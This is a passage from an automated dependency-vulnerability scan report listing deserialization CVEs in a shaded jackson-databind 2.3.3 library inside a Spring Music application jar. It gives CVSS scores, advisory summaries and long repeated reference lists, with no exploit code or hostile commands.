Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar (shaded: com.fasterxml.jackson.core:jackson-databind:2.3.3)Description:
General data-binding functionality for Jackson: works on core streaming API File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar/META-INF/maven/com.fasterxml.jackson.core/jackson-databind/pom.xmlMD5: 04e23f17a1150e7ec1f70eeac734af7dSHA1: fc2fa919676ab9574a7e312fd44741e5569b86a1SHA256: 711e6ba52cbad60347308ff19e464851c2aca09ec50b2a411b14d06d8df9ee84
Evidence Type Source Name Value Confidence Vendor pom artifactid jackson-databind Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name jackson-databind High Vendor pom parent-artifactid oss-parent Low Vendor pom parent-groupid com.fasterxml Medium Vendor pom url http://wiki.fasterxml.com/JacksonHome Highest Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product pom artifactid jackson-databind Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name jackson-databind High Product pom parent-artifactid oss-parent Medium Product pom parent-groupid com.fasterxml Medium Product pom url http://wiki.fasterxml.com/JacksonHome Medium Version pom parent-version 2.3.3 Low Version pom version 2.3.3 Highest
CVE-2017-15095 suppress
A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY secalert@redhat.com - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - ISSUE_TRACKING,THIRD_PARTY_ADVISORY secalert@redhat.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY,VDB_ENTRY secalert@redhat.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2017-17485 suppress
FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2017-7525 suppress
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
OSSINDEX - [CVE-2017-7525] CWE-184: Incomplete Blacklist OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7525 OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7525 OSSIndex - https://github.com/FasterXML/jackson-databind/issues/1599 af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY secalert@redhat.com - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - ISSUE_TRACKING,THIRD_PARTY_ADVISORY secalert@redhat.com - ISSUE_TRACKING,THIRD_PARTY_ADVISORY secalert@redhat.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert@redhat.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY,VDB_ENTRY secalert@redhat.com - THIRD_PARTY_ADVISORY,VDB_ENTRY secalert@redhat.com - THIRD_PARTY_ADVISORY,VDB_ENTRY secalert@redhat.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-11307 suppress
An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE Vulnerable Software & Versions: (show all )
CVE-2018-14718 suppress
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-14719 suppress
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-7489 suppress
FasterXML jackson-databind before 2.7.9.3, 2.8.x before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - 